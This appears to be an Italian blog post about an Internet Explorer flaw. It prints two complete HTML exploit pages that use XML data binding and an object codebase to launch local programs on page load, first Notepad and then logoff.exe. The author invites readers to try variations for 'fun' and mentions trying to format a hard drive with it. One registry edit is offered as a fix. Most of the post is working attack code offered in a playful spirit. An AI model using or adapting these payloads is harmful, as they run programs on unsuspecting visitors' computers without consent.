Discutevo in chat qualche minuto fa con David. Mi ha fatto partecipe di un exploit di IE che personalmente non conoscevo.

E' sufficiente inserire questo codice in una pagina html:

<html> 
<span datasrc="#oExec" datafld="exploit" dataformatas="html"></span> 
<xml id="oExec"> 
<security> 
<exploit> 
<![CDATA[ 
<object id="oFile" classid="clsid:11111111-1111-1111-1111-111111111111" 
codebase="c:/windows/notepad.exe"> 
</object> 
]]> 
</exploit> 
</security> 
</xml> 
</body> 
</html>

Per avviare qualsiasi file .exe presente sull'HD del computer in viene richiamata una pagina con questo codice - nell'esempio viene aperto il blocco note. Naturalmente - da buon masochista - ho provato sul mio computer a formattare l'hd ma, con mio immenso dispiacere, confesso che ci sono rimasto male, non ci sono riuscito.

E poi qualcuno mi chiede perché preferisco Mozilla che è immune da questo problema... Tzé!

A parte questo, sembra che modificando il registro di sistema com Regedit in questo modo:
[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0 ]
e cambiando il valore "di 1004" (DWORD) da "0" a "3" il problema scompaia. Ma quali divertimenti possono nascere da questo exploit? Proviamo a modificare il codice qui sopra in questo modo:

<html> 
<span datasrc="#oExec" datafld="exploit" dataformatas="html"></span> 
<xml id="oExec"> 
<security> 
<exploit> 
<![CDATA[ 
<object id="oFile" classid="clsid:11111111-1111-1111-1111-111111111111" 
codebase="c:/windows/system32/logoff.exe"> 
</object> 
]]> 
</exploit> 
</security> 
</xml> 
</body> 
</html>

E vedremo effettuare il logout del computer...